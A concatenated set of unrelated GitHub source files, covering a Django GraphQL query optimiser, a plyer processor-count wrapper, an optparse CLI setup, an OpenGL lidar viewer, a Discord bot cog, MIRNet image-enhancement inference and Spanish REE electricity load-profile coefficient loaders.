as DJANGO_VERSION\nfrom django.apps import apps\nfrom django.contrib.contenttypes.fields import GenericForeignKey, GenericRel\nfrom django.core.exceptions import ValidationError\nfrom django.db.models import NOT_PROVIDED, QuerySet, Manager, Prefetch\nfrom django.db.models.base import ModelBase\nfrom graphene.utils.str_converters import to_snake_case\nfrom graphene_django.utils import is_valid_django_model, get_reverse_fields\nfrom graphene_django.registry import get_global_registry\nfrom graphql import GraphQLList, GraphQLNonNull\nfrom graphql.language.ast import FragmentSpread\nfrom rest_framework.compat import _resolve_model\nfrom six import string_types\nfrom graphene_django_extras.utils import _get_queryset, get_related_fields\n\n\ndef get_prefetched_attr_name(field_name):\n \"\"\" Get the name of the attribute where a prefetched result will be stored \"\"\"\n return \"_prefetched_{}\".format(field_name)\n\n\ndef get_prefetched_attr(root, field_name, default=None):\n \"\"\" Get the prefetched value corresponding to the given field name (if it exists) \"\"\"\n return getattr(root, get_prefetched_attr_name(field_name), default)\n\n\ndef get_node_field(root_field, node_name):\n attr_node = getattr(root_field, node_name, None)\n if attr_node:\n return attr_node.type.of_type\n wrapper = root_field._meta.fields[node_name].type().type\n if hasattr(wrapper, '_meta'):\n return wrapper\n return wrapper.of_type\n\n\ndef recursive_optimize(root_field, selection_set, fragments, available_related_fields, select_related, prefetch_related, prefixes=[]):\n has_sub_nodes = False\n for field in selection_set.selections:\n temp = available_related_fields.get(\n field.name.value,\n available_related_fields.get(\n to_snake_case(field.name.value),\n None)\n )\n if temp and getattr(field, 'selection_set', None):\n has_sub_nodes = True\n if (temp.many_to_many or temp.one_to_many):\n related_field = getattr(root_field, temp.name)\n kwargs = dict([to_snake_case(i.name.value), i.value.value]\n for i in field.arguments)\n queryset = related_field.get_queryset(\n root_field, temp.name, [field], fragments, **kwargs)\n field_prefetch = Prefetch(\n temp.name, to_attr=get_prefetched_attr_name(temp.name), queryset=queryset)\n prefetch_related.append(field_prefetch)\n else:\n sub_node = get_node_field(root_field, temp.name)\n sub_prefixes = prefixes + [to_snake_case(temp.name)]\n recursive_optimize(\n sub_node,\n field.selection_set,\n fragments,\n get_related_fields(temp.related_model),\n select_related,\n prefetch_related,\n sub_prefixes\n )\n\n if not has_sub_nodes and prefixes:\n select_related.append(\"__\".join(prefixes))\n\n\ndef queryset_factory(root_field, fields_asts=None, fragments=None, **kwargs):\n manager = root_field._meta.model.objects\n select_related = []\n prefetch_related = []\n available_related_fields = get_related_fields(root_field._meta.model)\n\n for f in kwargs.keys():\n temp = available_related_fields.get(f.split('_', 1)[0], None)\n if temp:\n if (temp.many_to_many or temp.one_to_many) and \\\n temp.name not in prefetch_related:\n prefetch_related.append(temp.name)\n else:\n select_related.append(temp.name)\n\n if fields_asts:\n recursive_optimize(\n root_field,\n fields_asts[0].selection_set,\n fragments,\n available_related_fields,\n select_related,\n prefetch_related\n )\n\n if select_related and prefetch_related:\n return _get_queryset(manager.select_related(\n *select_related).prefetch_related(*prefetch_related))\n elif not select_related and prefetch_related:\n return _get_queryset(manager.prefetch_related(*prefetch_related))\n elif select_related and not prefetch_related:\n return _get_queryset(manager.select_related(*select_related))\n return _get_queryset(manager)\n","repo_name":"grahammcculloch/optimised-pagination","sub_path":"test-site/graphql_util/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25176464795","text":"from subprocess import Popen, PIPE\nfrom plyer.facades import Processors\nfrom plyer.utils import whereis_exe\n\nfrom os import environ\n\n\nclass LinuxProcessors(Processors):\n def _get_state(self):\n old_lang = environ.get('LANG')\n environ['LANG'] = 'C'\n\n status = {\"Number_of_Processors\": None}\n\n dev = \"--all\"\n nproc_process = Popen(\n [\"nproc\", dev],\n stdout=PIPE\n )\n output = nproc_process.communicate()[0]\n\n environ['LANG'] = old_lang\n\n if not output:\n return status\n\n status['Number_of_Processors'] = output.rstrip()\n\n return status\n\n\ndef instance():\n import sys\n if whereis_exe('nproc'):\n return LinuxProcessors()\n sys.stderr.write(\"nproc not found.\")\n return Processors()\n","repo_name":"kivy/plyer","sub_path":"plyer/platforms/linux/processors.py","file_name":"processors.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":1476,"dataset":"github-code","pt":"61"} +{"seq_id":"31385294140","text":"# This is set up in such a way that you should not need to alter this file to\n# add an argument, in most cases. See em_args.py\n\nimport optparse\nimport em_args\nfrom epumgmt.api.actions import ACTIONS\n\n# Not using yet\nEC_VERSION = \"X.Y\"\n\n# -----------------------------------------------------------------------------\n\ndef _add_option(group, arg):\n if arg.boolean:\n _add_boolean_option(group, arg)\n elif arg.string:\n _add_string_option(group, arg)\n else:\n raise Exception(\"unknown arg type\")\n \ndef _add_string_option(group, arg):\n if arg.short_syntax:\n group.add_option(arg.short_syntax, arg.long_syntax,\n dest=arg.dest, help=arg.help,\n metavar=arg.metavar)\n else:\n group.add_option(arg.long_syntax,\n dest=arg.dest, help=arg.help,\n metavar=arg.metavar)\n\ndef _add_boolean_option(group, arg):\n if arg.short_syntax:\n group.add_option(arg.short_syntax, arg.long_syntax,\n dest=arg.dest, help=arg.help,\n action=\"store_true\", default=False)\n else:\n group.add_option(arg.long_syntax,\n dest=arg.dest, help=arg.help,\n action=\"store_true\", default=False)\n\ndef parsersetup():\n \"\"\"Return configured command-line parser.\"\"\"\n\n ver=\"Nimbus EPU Management %s - http://www.nimbusproject.org\" % EC_VERSION\n usage=\"epumgmt action [Arguments]\"\n parser = optparse.OptionParser(version=ver, usage=usage)\n\n # ---------------------------------------\n \n # Might be helpful to have more groups in the future.\n actions = ACTIONS().all_actions()\n deprecated_args = []\n other_args = []\n \n for arg in em_args.ALL_EC_ARGS_LIST:\n if arg.deprecated:\n deprecated_args.append(arg)\n else:\n other_args.append(arg)\n \n \n # ---------------------------------------\n actions_title = \" Actions\"\n arguments_title = \" Arguments\"\n deprecated_title = \" Deprecated\"\n # For each one, use twice length of the longest one:\n groupline = (len(2*deprecated_title)-1) * \"-\"\n\n\n # Actions\n actions_description = \", \".join(ACTIONS().all_actions())\n group = optparse.OptionGroup(parser, actions_title, actions_description)\n parser.add_option_group(group)\n\n \n # Arguments\n group = optparse.OptionGroup(parser, arguments_title, groupline)\n for arg in other_args:\n _add_option(group, arg)\n parser.add_option_group(group)\n\n \n # Deprecated Arguments\n if len(deprecated_args) > 0:\n group = optparse.OptionGroup(parser, grouptxt2, groupline)\n for arg in deprecated_args:\n _add_option(group, arg)\n parser.add_option_group(group)\n \n return parser\n\ndef parse(argv):\n \"\"\"parse arguments from the command line\n\n The last positional argument will be considered the action.\n \"\"\"\n\n if not argv:\n return None, None\n parser = parsersetup()\n opts, args = parser.parse_args(argv)\n try:\n opts.action = args.pop()\n except IndexError:\n # No action specified\n pass\n\n return opts, args\n\ndef print_help():\n \"\"\"convenience function for printing help from other places in epumgmt\n \"\"\"\n parser = parsersetup()\n parser.print_help()\n\ndef print_version():\n \"\"\"convenience function for printing version from other places in epumgmt\n \"\"\"\n parser = parsersetup()\n parser.print_version()\n","repo_name":"nimbusproject/epumgmt","sub_path":"src/python/epumgmt/main/em_optparse.py","file_name":"em_optparse.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"21672963000","text":"import sys\nfrom OpenGL.GL import *\nfrom OpenGL.GLUT import *\nfrom OpenGL.GLU import *\nimport numpy as np\n\nimport serial\n\nw_size = 1000\nh_size = 1000\n\nser = serial.Serial(sys.argv[1], baudrate=115200)\nser.flush()\ncount = 0\n\nscale = 1.0 / 20\n\n\ndef reduce(distances, num_segments):\n global last_segment\n\n if 360 % num_segments != 0:\n raise Exception(\"360 must be divisible by num_segments\")\n\n step_size = int(360 / num_segments)\n segment = []\n for angle in range(0, 360, step_size):\n segment.append(int(np.mean(distances[angle : (angle + step_size)])))\n\n draw_segments(500, step_size, np.divide(segment, 10000))\n\n\navg_delta = 2\n\ndist = []\n\ndef read_data():\n global count\n global scale\n angle_adj = 0\n line = ser.readline().strip()\n # print(line)\n\n glBegin(GL_LINES)\n glColor3f(1.0, 0.0, 0.0)\n glVertex2f(w_size / 2 - 10, h_size / 2)\n glVertex2f(w_size / 2 + 10, h_size / 2)\n glVertex2f(w_size / 2, h_size / 2 - 10)\n glVertex2f(w_size / 2, h_size / 2 + 10)\n glEnd()\n\n raw_distances = []\n for angle in range(360):\n value = int(line[(angle * 4) : ((angle * 4) + 4)], 16)\n raw_distances.append(value)\n\n if int(len(line) / 4) == 360:\n dist.append(raw_distances)\n\n if len(dist) > avg_delta:\n del dist[0]\n\n distances = np.mean(dist, axis=0)\n reduce(np.abs(np.subtract(distances, raw_distances)), 180)\n\n glBegin(GL_POINTS)\n glColor3f(0.224, 1.0, .078)\n for angle in range(360):\n y = distances[angle] * scale * np.cos(np.deg2rad(angle + angle_adj))\n x = distances[angle] * scale * np.sin(np.deg2rad(angle + angle_adj))\n # print(w_size/2 + x, h_size/2 + y)\n glVertex2f(w_size / 2 + x, h_size / 2 + y)\n\n glEnd()\n\n # print(\"----------{}----------\".format(count))\n count += 1\n else:\n print(\"NOOOOOOO\")\n print(line)\n\n\ndef draw_segments(radius, step, colors=None):\n glBegin(GL_TRIANGLES)\n for angle in range(0, 360, step):\n if colors is None:\n glColor3f(\n 0.2 + (0.8 / (360 / step)) * (angle / step),\n 0.2 + (0.8 / (360 / step)) * (angle / step),\n 0.2 + (0.8 / (360 / step)) * (angle / step),\n )\n else:\n glColor3f(\n colors[int(angle / step)],\n colors[int(angle / step)],\n colors[int(angle / step)],\n )\n glVertex2f(w_size / 2, h_size / 2)\n glVertex2f(\n w_size / 2 + radius * np.sin(np.deg2rad(angle)),\n h_size / 2 + radius * np.cos(np.deg2rad(angle)),\n )\n glVertex2f(\n w_size / 2 + radius * np.sin(np.deg2rad(angle + step)),\n h_size / 2 + radius * np.cos(np.deg2rad(angle + step)),\n )\n glEnd()\n\n\ndef iterate():\n glViewport(0, 0, w_size, h_size)\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n glOrtho(0.0, w_size, 0.0, h_size, 0.0, 1.0)\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n\n\ndef showScreen():\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n glLoadIdentity()\n iterate()\n\n read_data()\n glutSwapBuffers()\n\n\nglutInit()\nglutInitDisplayMode(GLUT_RGBA)\nglutInitWindowSize(w_size, h_size)\nglutInitWindowPosition(0, 0)\nwind = glutCreateWindow(\"OpenGL Coding Practice\")\nglutDisplayFunc(showScreen)\nglutIdleFunc(showScreen)\nglutMainLoop()\n","repo_name":"alvarop/lidar","sub_path":"sw/gltest.py","file_name":"gltest.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27499618728","text":"import sys\n\nsys.stdin = open('input.txt')\n\ninput = sys.stdin.readline\nimport copy\n\nN = int(input())\narr = []\n\nfor _ in range(N):\n arr.append(int(input()))\ntmp = copy.deepcopy(arr)\n\nwhile True:\n minV = 101\n minI = []\n maxV = 0\n maxI = []\n for i in range(N):\n if arr[i] > maxV:\n maxI = []\n maxI.append(i)\n maxV = arr[i]\n elif arr[i] == maxV:\n maxI.append(i)\n\n if arr[i] < minV:\n minI = []\n minI.append(i)\n minV = arr[i]\n elif arr[i] == minV:\n minI.append(i)\n\n if maxV - minV > 17:\n if len(maxI) > len(minI):\n for i in minI:\n arr[i] += 1\n else:\n for i in maxI:\n arr[i] -= 1\n else:\n break\n\nans = 0\nfor i in range(N):\n if tmp[i] != arr[i]:\n ans += (tmp[i] - arr[i])**2\nprint(tmp)\nprint(arr)\nprint(ans)\n","repo_name":"khjeon5328/today_algorithm","sub_path":"2021/2021.06월/7일/9881.py","file_name":"9881.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13167887842","text":"from src.utils.checks import *\nfrom src.tools.BotTools import *\nfrom discord.ext import commands\nimport logging,asyncio\nimport discord\nimport os\nimport typing\nfrom random import choice\nfrom src.tools.Translator import *\nfrom src.utils.config import *\n\nclass NSFW(commands.Cog):\n def __init__(self,bot,logger):\n self.bot = bot\n self.logger = logger\n\n @commands.cooldown(5,30,commands.BucketType.channel)\n @commands.cooldown(1,5,commands.BucketType.user)\n @commands.is_nsfw()\n @commands.command()\n async def nsfwjoke(self,ctx,lang: typing.Optional[str] = \"FR\"):\n \"\"\"**NSFW channel required**\n Display a NSFW joke (only in french currently)\"\"\"\n if lang in [\"FR\", \"EN\"]:\n with open(\"{}/nsfw-{}.txt\".format(Config()[\"directories\"][\"jokes\"], lang),encoding=\"utf-8\") as f:\n jokelist = f.readlines()\n if len(jokelist) > 0:\n await ctx.message.channel.send(choice(jokelist).replace(\"\\\\n\",\"\\n\"))\n else:\n data = GenericCommandParameters(ctx)\n await ctx.message.channel.send(data.lang[\"nojoke\"].format(lang))\n else:\n data = GenericCommandParameters(ctx)\n await ctx.message.channel.send(data.lang[\"nojoke\"].format(lang))\n\n @commands.cooldown(5,30,commands.BucketType.channel)\n @commands.cooldown(3,5,commands.BucketType.user)\n @commands.is_nsfw()\n @commands.command()\n async def hentai(self,ctx):\n \"\"\"**NSFW channel required**\n Display a random hentai pic :smirk:\"\"\"\n with open(\"Hentai/{}\".format(choice(os.listdir(\"Hentai\"))),\"rb\") as f:\n await ctx.message.channel.send(file=discord.File(f))\n\n @commands.cooldown(1,30,commands.BucketType.channel)\n @commands.is_nsfw()\n @commands.command()\n async def rule34(self,ctx):\n \"\"\"**NSFW channel required**\n Do you really need some further explanations ?\"\"\"\n await ctx.message.channel.send(\"Rule 34 : *If it exists, there is porn on it*\\nhttps://rule34.paheal.net/\")\n","repo_name":"ttgc/TtgcBot","sub_path":"src/cogs/NSFW.py","file_name":"NSFW.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9875578010","text":"import os\r\nimport numpy as np\r\nfrom PIL import Image\r\nfrom keras import utils\r\nfrom keras.models import load_model\r\nfrom mirnet import *\r\nfrom train import charbonnier_loss, peak_signal_noise_ratio\r\n \r\n\r\nMODEL_DIR = \"./checkpoints\"\r\n\r\n\r\ndef infer(model, original_image):\r\n image = utils.img_to_array(original_image)\r\n image = image.astype(\"float32\") / 255.0\r\n image = np.expand_dims(image, axis=0)\r\n output = model.predict(image)\r\n output_image = output[0] * 255.0\r\n output_image = output_image.clip(0, 255)\r\n output_image = output_image.reshape(\r\n (np.shape(output_image)[0], np.shape(output_image)[1], 3)\r\n )\r\n output_image = Image.fromarray(np.uint8(output_image))\r\n original_image = Image.fromarray(np.uint8(original_image))\r\n return output_image\r\n\r\n\r\nif __name__ == \"__main__\":\r\n \r\n model_path = os.listdir(MODEL_DIR)[0]\r\n model_path = f\"{MODEL_DIR}/{model_path}\"\r\n\r\n model = load_model(\r\n model_path, custom_objects={\r\n \"selective_kernel_feature_fusion\": selective_kernel_feature_fusion,\r\n \"spatial_attention_block\": spatial_attention_block, \r\n \"channel_attention_block\": channel_attention_block, \r\n \"dual_attention_unit_block\": dual_attention_unit_block, \r\n \"down_sampling_module\": down_sampling_module, \r\n \"up_sampling_module\": up_sampling_module, \r\n \"multi_scale_residual_block\": multi_scale_residual_block, \r\n \"recursive_residual_group\": recursive_residual_group,\r\n \"charbonnier_loss\": charbonnier_loss,\r\n \"peak_signal_noise_ratio\": peak_signal_noise_ratio,\r\n },\r\n )\r\n\r\n print(f\"\\nModel loaded: {model_path}\\n\")\r\n\r\n while True:\r\n image_path = input(\"Please enter an image path >> \")\r\n \r\n if image_path == \"exit\" or image_path == \"stop\" or image_path == \"break\":\r\n print(\"\\n[Exiting the programme...]\\n\")\r\n break\r\n\r\n save_path = input(\"Please enter a path for saving the result >> \")\r\n\r\n original_image = Image.open(image_path).convert(\"RGB\")\r\n\r\n width, height = original_image.size\r\n\r\n while True:\r\n if width % 8 != 0:\r\n width -= 1\r\n else:\r\n break\r\n\r\n while True:\r\n if height % 8 != 0:\r\n height -= 1\r\n else:\r\n break\r\n \r\n original_image = original_image.crop((0, 0, width, height))\r\n\r\n print(original_image.size)\r\n\r\n print(\"\\n[Infering...]\\n\")\r\n result = infer(model, original_image)\r\n\r\n result.save(save_path)\r\n print(f\"\\nDone. The result was saved to {save_path}.\\n\")\r\n\r\n","repo_name":"henryyantq/MIRNet-Keras","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44441158032","text":"# Configuration file for the Sphinx documentation builder.\n\nimport os\nimport sys\n\nsys.path.insert(0, os.path.abspath('..'))\n\nproject = 'LoanPy'\ncopyright = '2023, Viktor Martinović'\nauthor = 'Viktor Martinović'\nversion = '3.0'\nrelease = '3.0'\n\nhtml_theme = 'sphinx_rtd_theme'\nextensions = ['sphinx.ext.autodoc', 'sphinx_copybutton']\n\n# Links\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#general-configuration\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output\n# https://www.sphinx-doc.org/en/master/usage/configuration.html\n# https://sphinx-copybutton.readthedocs.io/en/latest/index.html\n","repo_name":"LoanpyDataHub/loanpy","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"61"} +{"seq_id":"34453042772","text":"from BasePage import BasePage\nfrom BasePage import IncorrectPageException\nfrom oig.Constants import TT_Constants\nfrom oig.UIMap import FraudOtherFraudPageMap\n\n\n#this is a page object for the Fraud Alerts - Other Fraud Sites of Interest info page\n#accessed after clicking the Other Fraud Sites of Interest link \nclass FraudOtherFraudPage(BasePage):\n\n def __init__(self, driver):\n super(FraudOtherFraudPage, self).__init__(driver)\n \n def _verify_page(self):\n try:\n self.wait_for_element_visibility(10, \n \"xpath\", \n FraudOtherFraudPageMap['FraudOtherFraudBannerXpath']\n )\n except: \n raise IncorrectPageException\n \n \n \n ","repo_name":"vleung1/portfolio","sub_path":"Vincent_Leung_Portfolio_2016/test-automation/oig/pages/FraudOtherFraudPage.py","file_name":"FraudOtherFraudPage.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27893426725","text":"# -*- coding: utf-8 -*-\nfrom __future__ import division\n\nimport bisect\nimport logging\ntry:\n from collections import namedtuple, Counter\nexcept ImportError:\n from backport_collections import namedtuple, Counter\nfrom datetime import datetime, date, timedelta\nfrom multiprocessing import Lock\ntry:\n from StringIO import StringIO\nexcept ImportError:\n from io import StringIO\nfrom dateutil.relativedelta import relativedelta\nfrom decimal import Decimal\nfrom six import string_types\n\nfrom ..profiles import Dragger\nfrom ..contracts.tariff import Tariff, T30A_one_period, T31A_one_period, T31A\nfrom ..datetime.timezone import TIMEZONE\nfrom ..metering.measure import Measure, EnergyMeasure\nfrom ..datetime.solar_hour import convert_to_solar_hour\n\nfrom os import path\nfrom six import BytesIO\nimport pandas as pd\nimport bz2\nimport csv\nimport gzip\nimport requests\n\ntry:\n import httplib\nexcept ImportError:\n import http.client as httplib\n\n\nlogger = logging.getLogger(__name__)\n\n\nCOEFFS = ['A', 'B', 'C', 'D']\nEXTRA_COEFFS = ['2.0TD', '3.0TD', '3.0TDVE']\n\n\ndef get_tariff_coeffs_list(year, month):\n assert isinstance(year, int)\n assert isinstance(month, int)\n if (year >= 2021 and month >= 6) or year >= 2022: # temporal solution, till REE publish new coeffs for 2022\n return EXTRA_COEFFS\n else:\n return COEFFS\n\n\nclass Coefficent(namedtuple('Coefficient', ['hour', 'cof'])):\n __slots__ = ()\n\n def __lt__(self, other):\n return self.hour < other.hour\n\n def __le__(self, other):\n return self.hour <= other.hour\n\n def __gt__(self, other):\n return self.hour > other.hour\n\n def __ge__(self, other):\n return self.hour >= other.hour\n\n\nclass Coefficients(object):\n def __init__(self, coefs=None):\n if coefs is None:\n coefs = []\n assert isinstance(coefs, list)\n self.coefs = list(coefs)\n\n def _check_pos(self, pos):\n if pos == len(self.coefs):\n raise ValueError('start date not found in coefficients')\n\n def insert_coefs(self, coefs):\n pos_0 = bisect.bisect_left(self.coefs, Coefficent(coefs[0][0], {}))\n pos_1 = bisect.bisect_right(self.coefs, Coefficent(coefs[-1][0], {}))\n logger.debug('Deleting from {start}({pos_0}) to {end}({pos_1})'.format(\n start=coefs[0][0], end=coefs[-1][0], pos_0=pos_0, pos_1=pos_1\n ))\n del self.coefs[pos_0:pos_1]\n for c in reversed(coefs):\n logger.debug('Inserting {c} into {pos_0}'.format(\n c=c, pos_0=pos_0\n ))\n self.coefs.insert(pos_0, c)\n\n def get(self, dt):\n assert isinstance(dt, datetime)\n if dt.dst() is None:\n dt = TIMEZONE.localize(dt)\n dt = TIMEZONE.normalize(dt)\n pos = bisect.bisect_left(self.coefs, Coefficent(dt, {}))\n self._check_pos(pos)\n return self.coefs[pos]\n\n def get_range(self, start, end):\n assert isinstance(start, date)\n assert isinstance(end, date)\n start = TIMEZONE.localize(datetime(\n start.year, start.month, start.day, 1), is_dst=True\n )\n # Sum one day to get the hour 00:00 of the next day\n end += timedelta(days=1)\n end = TIMEZONE.localize(datetime(\n end.year, end.month, end.day), is_dst=True\n ) + timedelta(seconds=1)\n pos = bisect.bisect_left(self.coefs, Coefficent(start, {}))\n self._check_pos(pos)\n end_pos = bisect.bisect_right(self.coefs, Coefficent(end, {}))\n return self.coefs[pos:end_pos]\n\n def get_coefs_by_tariff(self, tariff, start, end):\n assert hasattr(tariff, 'get_period_by_date')\n assert hasattr(tariff, 'energy_periods')\n assert isinstance(start, date)\n assert isinstance(end, date)\n sum_cofs = dict.fromkeys(tariff.energy_periods.keys(), 0)\n for hour, coef in self.get_range(start, end):\n if len(sum_cofs) > 1:\n dt = hour - timedelta(minutes=1)\n period = tariff.get_period_by_date(dt)\n p_name = period.code\n else:\n p_name = sum_cofs.keys()[0]\n sum_cofs[p_name] += coef[tariff.cof]\n return sum_cofs\n\n\nclass Profiler(object):\n def __init__(self, coefficient):\n self.coefficient = coefficient\n\n def profile(self, tariff, measures, drag_method='hour'):\n \"\"\"\n :param tariff:\n :param measures:\n :param drag_method: 'hour' means drag is passed to the next hour\n 'period' means drag is passed to the next hour for\n the same period\n :return:\n \"\"\"\n # {'PX': [(date(XXXX-XX-XX), 100), (date(XXXX-XX-XX), 110)]}\n _measures = list(measures)\n measures = {}\n for m in sorted(_measures):\n measures.setdefault(m.period.code, [])\n measures[m.period.code].append(m)\n measures_intervals = EnergyMeasure.intervals(_measures)\n # Detect single day profiling case\n if len(measures_intervals) == 1:\n measures_intervals.append(measures_intervals[-1]) # duplicate measure date to do not skip loop below\n logger.debug('Profiling {0} intervals'.format(len(measures_intervals)))\n for idx, measure_date in enumerate(measures_intervals):\n if idx + 1 == len(measures_intervals):\n break\n start = measure_date\n if idx > 0:\n start += timedelta(days=1)\n end = measures_intervals[idx + 1]\n logger.debug('Getting coeffs from {0} to {1}'.format(\n start, end\n ))\n sum_cofs = self.coefficient.get_coefs_by_tariff(tariff, start, end)\n dragger = Dragger()\n for hour, cof in self.coefficient.get_range(start, end):\n dt = hour - timedelta(minutes=1)\n period = tariff.get_period_by_date(dt)\n if drag_method == 'hour':\n dp = 'hour'\n else:\n dp = period.code\n d = hour.date()\n if hour.hour == 0:\n d -= timedelta(days=1)\n # To take the first measure\n if d == start and len(set(measures_intervals)) != 1: # if single day case, do not regress date\n d += timedelta(days=1)\n fake_m = Measure(d, period, 0)\n pos = bisect.bisect_left(measures.get(period.code, []), fake_m)\n pcode = period.code\n if pcode not in measures or pos >= len(measures[period.code]):\n consumption = 0\n consumption_date = None\n else:\n consumption = measures[period.code][pos].consumption\n consumption_date = measures[period.code][pos].date\n logger.debug('Hour: {0} Period: {1} Consumption: {2}'.format(\n hour, period.code, consumption\n ))\n cof = cof[tariff.cof]\n hour_c = ((consumption * cof) / sum_cofs[period.code])\n aprox = dragger.drag(hour_c, key=dp)\n yield (\n hour,\n {\n 'aprox': aprox,\n 'drag': dragger[dp],\n 'consumption': consumption,\n 'consumption_date': consumption_date,\n 'sum_cofs': sum_cofs[period.code],\n 'cof': cof,\n 'period': period.code\n }\n )\n\n\nclass REEProfile(object):\n HOST = 'www.ree.es'\n PATH = '/sites/default/files/simel/perff'\n GISCE_URL = 'https://github.com/gisce/ree_monthly_profiles/blob/main/perff/'\n down_lock = Lock()\n\n _CACHE = {}\n\n @classmethod\n def get_range(cls, start, end):\n cofs = []\n start = datetime(start.year, start.month, 1)\n end = datetime(end.year, end.month, 1)\n while start <= end:\n logger.debug('Downloading coefficients for {0}/{1}'.format(\n start.month, start.year\n ))\n cofs.extend(REEProfile.get(start.year, start.month))\n start += relativedelta(months=1)\n return cofs\n\n @classmethod\n def get(cls, year, month):\n try:\n import ssl\n try:\n _create_unverified_https_context = ssl._create_unverified_context\n except AttributeError:\n pass\n else:\n ssl._create_default_https_context = _create_unverified_https_context\n except ImportError:\n pass\n conn = None\n try:\n cls.down_lock.acquire()\n\n key = '%(year)s%(month)02i' % locals()\n if key in cls._CACHE:\n logger.debug('Using CACHE for REEProfile {0}'.format(key))\n return cls._CACHE[key]\n perff_file = 'PERFF_%(key)s.gz' % locals()\n conn = httplib.HTTPSConnection(cls.HOST)\n conn.request('GET', '%s/%s' % (cls.PATH, perff_file))\n logger.debug('Downloading REEProfile from {0}/{1}'.format(\n cls.PATH, perff_file\n ))\n r = conn.getresponse()\n if r.getheader('Content-Type') == 'application/x-gzip':\n content = r.read()\n try:\n c = StringIO(content)\n m = StringIO(gzip.GzipFile(fileobj=c).read())\n except:\n c = BytesIO(content)\n n = BytesIO(gzip.GzipFile(fileobj=c).read())\n content = n.read().decode('iso8859-15')\n m = StringIO(content)\n c.close()\n reader = csv.reader(m, delimiter=';')\n header = True\n cofs = []\n coeffs_list = get_tariff_coeffs_list(year, month)\n for vals in reader:\n if header:\n header = False\n continue\n if int(vals[3]) == 1:\n n_hour = 1\n dt = datetime(\n int(vals[0]), int(vals[1]), int(vals[2])\n )\n day = TIMEZONE.localize(dt, is_dst=bool(not int(vals[4])))\n day += timedelta(hours=n_hour)\n n_hour += 1\n cofs.append(Coefficent(\n TIMEZONE.normalize(day), dict(\n (k, float(vals[i])) for i, k in enumerate(coeffs_list, 5)\n ))\n )\n cls._CACHE[key] = cofs\n return cofs\n else:\n try:\n perff_file = 'PERFF_%(key)s.0.bz2' % locals()\n r = requests.get(cls.GISCE_URL + perff_file, params={'raw': 'true'})\n c = StringIO(r.content)\n m = StringIO(bz2.decompress(c.read()))\n reader = csv.reader(m, delimiter=';')\n header = True\n cofs = []\n coeffs_list = get_tariff_coeffs_list(year, month)\n for vals in reader:\n if header:\n header = False\n continue\n if int(vals[3]) == 1:\n n_hour = 1\n dt = datetime(\n int(vals[0]), int(vals[1]), int(vals[2])\n )\n day = TIMEZONE.localize(dt, is_dst=bool(not int(vals[4])))\n day += timedelta(hours=n_hour)\n n_hour += 1\n cofs.append(Coefficent(\n TIMEZONE.normalize(day), dict(\n (k, float(vals[i])) for i, k in enumerate(coeffs_list, 5)\n ))\n )\n cls._CACHE[key] = cofs\n return cofs\n except:\n raise Exception('Profiles from REE not found')\n finally:\n if conn is not None:\n conn.close()\n cls.down_lock.release()\n\n\nclass REProfile(object):\n translate_month = {\n 1: 'Enero',\n 2: 'Febrero',\n 3: 'Marzo',\n 4: 'Abril',\n 5: 'Mayo',\n 6: 'Junio',\n 7: 'Julio',\n 8: 'Agosto',\n 9: 'Septiembre',\n 10: 'Octubre',\n 11: 'Noviembre',\n 12: 'Diciembre'\n }\n\n @classmethod\n def get_range(cls, start, end):\n sheet_name = 'zona_{}'.format(cls.climatic_zone)\n filename = path.join(\n path.dirname(path.realpath(__file__)), 'data/coefficients_RE.xlsx'\n )\n df = pd.read_excel(filename, sheet_name=sheet_name)\n key = df.keys()[0]\n cofs = []\n while start <= end:\n month = cls.translate_month[start.month]\n solar_hour = convert_to_solar_hour(start)\n if solar_hour.hour != 0:\n hour = solar_hour.hour\n else:\n hour = 24\n coff_value = float(df[df[key] == month][hour])\n coff = Coefficent(start, {'A': coff_value})\n cofs.append(coff)\n start += relativedelta(hours=1)\n return cofs\n\n @classmethod\n def validate_exported_energy(cls, measures):\n \"\"\"\n Check if there are ProfileHour with energy != 0 in periods with RE coefficient == 0\n :param measures: A list ProfileHour objects\n :return valid: A boolean that indicates if all the profiles in measures are valid\n :return invalid_profiles: A list containing the invalid profiles in measures\n \"\"\"\n # Check if measures list is valid\n valid = True\n # Save invalid profiles\n invalid_profiles = []\n # get and iterate RE coefficients\n coefficients = cls.get_range(min(measures).date, max(measures).date)\n # iterate all RE measures\n for measure in measures:\n # if energy value is not zero\n if measure[1] != 0:\n # fetch coeff by profile date\n cof = False\n for c in coefficients:\n if c.hour == measure[0]:\n cof = c\n break\n if cof:\n # if coeff is zero\n if cof.cof['A'] == 0:\n # replace energy value by 'warning'\n invalid_profiles.append(measure)\n # mark measures as invalid\n valid = False\n return valid, invalid_profiles\n\n\nclass REProfileZone1(REProfile):\n climatic_zone = 1\n\n\nclass REProfileZone2(REProfile):\n climatic_zone = 2\n\n\nclass REProfileZone3(REProfile):\n climatic_zone = 3\n\n\nclass 